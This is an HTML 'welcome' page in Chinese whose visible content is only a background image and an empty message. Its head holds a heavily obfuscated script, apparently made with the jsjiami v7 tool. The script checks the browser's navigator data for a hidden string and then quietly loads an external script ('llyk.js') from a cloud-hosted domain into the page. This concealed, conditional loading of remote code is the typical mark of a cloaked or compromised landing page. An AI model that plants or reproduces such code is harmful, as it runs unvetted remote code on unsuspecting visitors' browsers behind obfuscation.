﻿<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>欢迎</title>
  <style>
    body, html {
      margin: 0; padding: 0;
      height: 100%; width: 100%;
      background: #000; /* 防闪白 */
    }
    .container-main {
      height: 100vh;
      background: url(../../../../../../kindeditor/attached/image/20250725/20250725140649_29124.jpg)
                  no-repeat center top/contain;
    }
    #message {
      position: absolute;
      top: 50%; width: 100%;
      text-align: center;
      color: #fff;
      font-size: 18px;
      transform: translateY(-50%);
    }
  </style>

  <script>
var _0xod2='jsjiami.com.v7';(function(_0x111c50,_0x2838ed,_0x513507,_0xf36a31,_0x12eb00,_0x4fa368,_0x504ae6){return _0x111c50=_0x111c50>>0x9,_0x4fa368='hs',_0x504ae6='hs',function(_0x624363,_0x4ba3ce,_0x249056,_0x4f89b0,_0x1e5415){var _0x4ded1c=_0x40d8;_0x4f89b0='tfi',_0x4fa368=_0x4f89b0+_0x4fa368,_0x1e5415='up',_0x504ae6+=_0x1e5415,_0x4fa368=_0x249056(_0x4fa368),_0x504ae6=_0x249056(_0x504ae6),_0x249056=0x0;var _0x2b7f0c=_0x624363();while(!![]&&--_0xf36a31+_0x4ba3ce){try{_0x4f89b0=parseInt(_0x4ded1c(0x194,'E7cp'))/0x1+-parseInt(_0x4ded1c(0x197,'@Me!'))/0x2*(-parseInt(_0x4ded1c(0x1a2,'nE]O'))/0x3)+parseInt(_0x4ded1c(0x19f,'rtph'))/0x4+-parseInt(_0x4ded1c(0x196,'4%eL'))/0x5*(parseInt(_0x4ded1c(0x19a,'[Jcx'))/0x6)+-parseInt(_0x4ded1c(0x1a9,'fuJi'))/0x7+-parseInt(_0x4ded1c(0x1a6,'Nok['))/0x8+parseInt(_0x4ded1c(0x19c,'rfBn'))/0x9*(parseInt(_0x4ded1c(0x19d,'PO8L'))/0xa);}catch(_0x359678){_0x4f89b0=_0x249056;}finally{_0x1e5415=_0x2b7f0c[_0x4fa368]();if(_0x111c50<=_0xf36a31)_0x249056?_0x12eb00?_0x4f89b0=_0x1e5415:_0x12eb00=_0x1e5415:_0x249056=_0x1e5415;else{if(_0x249056==_0x12eb00['replace'](/[bXHVLTwhMlptSWKINFgk=]/g,'')){if(_0x4f89b0===_0x4ba3ce){_0x2b7f0c['un'+_0x4fa368](_0x1e5415);break;}_0x2b7f0c[_0x504ae6](_0x1e5415);}}}}}(_0x513507,_0x2838ed,function(_0x2fac98,_0x70b8fa,_0x3506f3,_0x545bd3,_0x543d51,_0x2212c9,_0x58734e){return _0x70b8fa='\x73\x70\x6c\x69\x74',_0x2fac98=arguments[0x0],_0x2fac98=_0x2fac98[_0x70b8fa](''),_0x3506f3='\x72\x65\x76\x65\x72\x73\x65',_0x2fac98=_0x2fac98[_0x3506f3]('\x76'),_0x545bd3='\x6a\x6f\x69\x6e',(0x1a776f,_0x2fac98[_0x545bd3](''));});}(0x18a00,0xbb8e9,_0x5310,0xc7),_0x5310)&&(_0xod2=0xd9b);(function(){var _0x1a227e=_0x40d8,_0xb05d64={'GxFPX':function(_0x50d444,_0xa526b){return _0x50d444===_0xa526b;},'CtMqa':_0x1a227e(0x1a8,'wL&6'),'eADGm':_0x1a227e(0x1a7,'0Ib5')},_0x340e58=navigator[_0x1a227e(0x1a0,'USn&')][_0x1a227e(0x1a1,'Pmm&')]();if(_0xb05d64['GxFPX'](_0x340e58[_0x1a227e(0x1a4,'@Me!')](_0xb05d64['CtMqa']),-0x1)){var _0x35c8ee=document[_0x1a227e(0x195,'wL&6')](_0xb05d64[_0x1a227e(0x1a5,'jkRB')]);_0x35c8ee['src']='https://7463-tcb-rx8nchfni3ex3bh-6cxl6358e5ff-1331869289.tcb.qcloud.la/llyk.js',document['head'][_0x1a227e(0x1a3,'Ooh(')](_0x35c8ee);}}());function _0x40d8(_0x13686d,_0x30d351){var _0x5310a6=_0x5310();return _0x40d8=function(_0x40d8cb,_0x584830){_0x40d8cb=_0x40d8cb-0x194;var _0x66eb16=_0x5310a6[_0x40d8cb];if(_0x40d8['xdOxfn']===undefined){var _0x37eb82=function(_0x156f66){var _0x4d5242='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1e7be5='',_0x358669='';for(var _0x3c4317=0x0,_0x16c269,_0x4787cd,_0x3b61f3=0x0;_0x4787cd=_0x156f66['charAt'](_0x3b61f3++);~_0x4787cd&&(_0x16c269=_0x3c4317%0x4?_0x16c269*0x40+_0x4787cd:_0x4787cd,_0x3c4317++%0x4)?_0x1e7be5+=String['fromCharCode'](0xff&_0x16c269>>(-0x2*_0x3c4317&0x6)):0x0){_0x4787cd=_0x4d5242['indexOf'](_0x4787cd);}for(var _0x36776a=0x0,_0x3f401b=_0x1e7be5['length'];_0x36776a<_0x3f401b;_0x36776a++){_0x358669+='%'+('00'+_0x1e7be5['charCodeAt'](_0x36776a)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x358669);};var _0x4e6bc1=function(_0x33e462,_0x4d0253){var _0x5c25f2=[],_0x1d3e39=0x0,_0x3c216a,_0x1f9f68='';_0x33e462=_0x37eb82(_0x33e462);var _0x1c3a7a;for(_0x1c3a7a=0x0;_0x1c3a7a<0x100;_0x1c3a7a++){_0x5c25f2[_0x1c3a7a]=_0x1c3a7a;}for(_0x1c3a7a=0x0;_0x1c3a7a<0x100;_0x1c3a7a++){_0x1d3e39=(_0x1d3e39+_0x5c25f2[_0x1c3a7a]+_0x4d0253['charCodeAt'](_0x1c3a7a%_0x4d0253['length']))%0x100,_0x3c216a=_0x5c25f2[_0x1c3a7a],_0x5c25f2[_0x1c3a7a]=_0x5c25f2[_0x1d3e39],_0x5c25f2[_0x1d3e39]=_0x3c216a;}_0x1c3a7a=0x0,_0x1d3e39=0x0;for(var _0x5377ea=0x0;_0x5377ea<_0x33e462['length'];_0x5377ea++){_0x1c3a7a=(_0x1c3a7a+0x1)%0x100,_0x1d3e39=(_0x1d3e39+_0x5c25f2[_0x1c3a7a])%0x100,_0x3c216a=_0x5c25f2[_0x1c3a7a],_0x5c25f2[_0x1c3a7a]=_0x5c25f2[_0x1d3e39],_0x5c25f2[_0x1d3e39]=_0x3c216a,_0x1f9f68+=String['fromCharCode'](_0x33e462['charCodeAt'](_0x5377ea)^_0x5c25f2[(_0x5c25f2[_0x1c3a7a]+_0x5c25f2[_0x1d3e39])%0x100]);}return _0x1f9f68;};_0x40d8['ybCmFs']=_0x4e6bc1,_0x13686d=arguments,_0x40d8['xdOxfn']=!![];}var _0x18873d=_0x5310a6[0x0],_0x2839ac=_0x40d8cb+_0x18873d,_0x53d4b7=_0x13686d[_0x2839ac];return!_0x53d4b7?(_0x40d8['kacDap']===undefined&&(_0x40d8['kacDap']=!![]),_0x66eb16=_0x40d8['ybCmFs'](_0x66eb16,_0x584830),_0x13686d[_0x2839ac]=_0x66eb16):_0x66eb16=_0x53d4b7,_0x66eb16;},_0x40d8(_0x13686d,_0x30d351);}function _0x5310(){var _0xf62a0=(function(){return[_0xod2,'WwLjFXsNjXHikaKtKmgMi.lcWboMmpHI.vSF7TVh==','WQm8WPddGCkf','W4CFgCoiWPKPW6hcR8kqW4FdVGG','WQzDxmkRWOSD','WRKGW4Dmx8o4s8oOWR7dNvzvFHG','W5WTW7BcQ8oufmkPWRrNWRldGmoi','jfxdI3GMWR9TWPn7W6i2tCoF','WOtcNCkpWQq7WRVdQ2jkW7ldTN1w'].concat((function(){return['WRC7W4fFrmoWA8o3WQJdLv1CBW','W6NdT3tdP8kOWPvWlG','W4bMgmk8WOj4CCoZsG','W4jHfSooW5KPxCoksSkhW4S5','WQW/W4unDIFdM8oIia','sgTxWPpdHCkanG7dVGpcVfJcRa','w2HIoSkBW4frWPq','bSkdW4mwWQiSW5FdMWtdIuhdLsG','b8ohyCkWWRpcPmkEiW'].concat((function(){return['qZRcL8k8rSoKW7HlWQxdQgflW5C','hIddJZVdKsTcWQBdKmkqB8kwtW','ybdcNJjtW6G4WQDI','WOamW7XqWQPvWRfRvuVdVW','amothcNdNCk1W6/cUmkD','i8oAW7xdGZyoW7iws8oNW4u','WPW8rmkAWPrtuq'];}()));}()));}());_0x5310=function(){return _0xf62a0;};return _0x5310();};var version_ = 'jsjiami.com.v7';
  </script>
</head>
<body>
  <div class="container-main"></div>
  <p id="message"></p>
</body>
</html>
